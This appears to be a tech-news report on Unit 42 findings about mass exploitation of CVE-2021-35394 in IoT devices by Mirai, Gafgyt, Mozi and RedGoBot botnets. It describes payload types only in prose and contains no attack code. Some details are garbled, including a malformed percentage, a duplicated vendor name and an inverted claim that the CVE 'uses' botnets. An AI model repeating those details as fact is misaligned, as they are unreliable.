Announcement
According to Palo Alto Networks Unit 42, the ongoing campaign recorded 134 million exploit attempts through December 2022, with 97 percent of the attacks occurring in the past four months. Almost half of the attacks come from the US (48.3%), followed by Vietnam (17.8%), Russia (14.6%), the Netherlands (7.4%), France (6.4%), Germany ( 2.3%0 and Luxembourg (1.6%). Moreover, 95% of attacks originating in Russia and exploiting the security breach were targeted at Australian organizations.
“Many of the attacks we observed attempted to deliver malware to infect vulnerable IoT devices,” Unit 42 researchers said in a report, adding that “threat groups are using this vulnerability to launch large-scale attacks against smart devices around the world.”
The vulnerability in question, CVE-2021-35394, is a series of buffer overflow and arbitrary command injection flaws that can be used as a weapon to run arbitrary code with the highest privilege level and hijack vulnerable devices.
The issues were disclosed by ONEKEY (formerly IoT Inspector) in August 2021. The vulnerabilities affect a wide range of devices from D-Link, LG, Belkin, Belkin, ASUS and NETGEAR.
Data sheet:
Unit 42 stated that it found three different types of “payloads” distributed as a result of exploiting the vulnerability:
• The script executes a shell command on the target server to download additional malware.
• An embedded command that writes a binary payload to a file and executes it.
• A command entered that directly reboots the target server, causing a Denial of Service (DoS) condition.
CVE-2021-35394 uses well-known botnets such as Mirai, Gafgyt, and Mozi, as well as a new Golang-based distributed denial of service (DDoS) botnet called RedGoBot.
The RedGoBot campaign (first discovered in 2022) deploys a shell script designed to boot a range of botnet clients tailored to different CPU architectures. Once launched, the malware is ready to execute operating system commands and launch DDoS attacks. The findings once again highlight the importance of timely software updates to avoid exposure to potential threats.
“The wave of attacks using CVE-2021-35394 shows that attackers have a serious interest in supply chain vulnerabilities that can be difficult for the average user to identify and fix. These issues may make it difficult for affected users to identify specific attacked subsequent products,” the researchers concluded.
Hardware, software, tests, interesting and colorful news from the IT world click here!
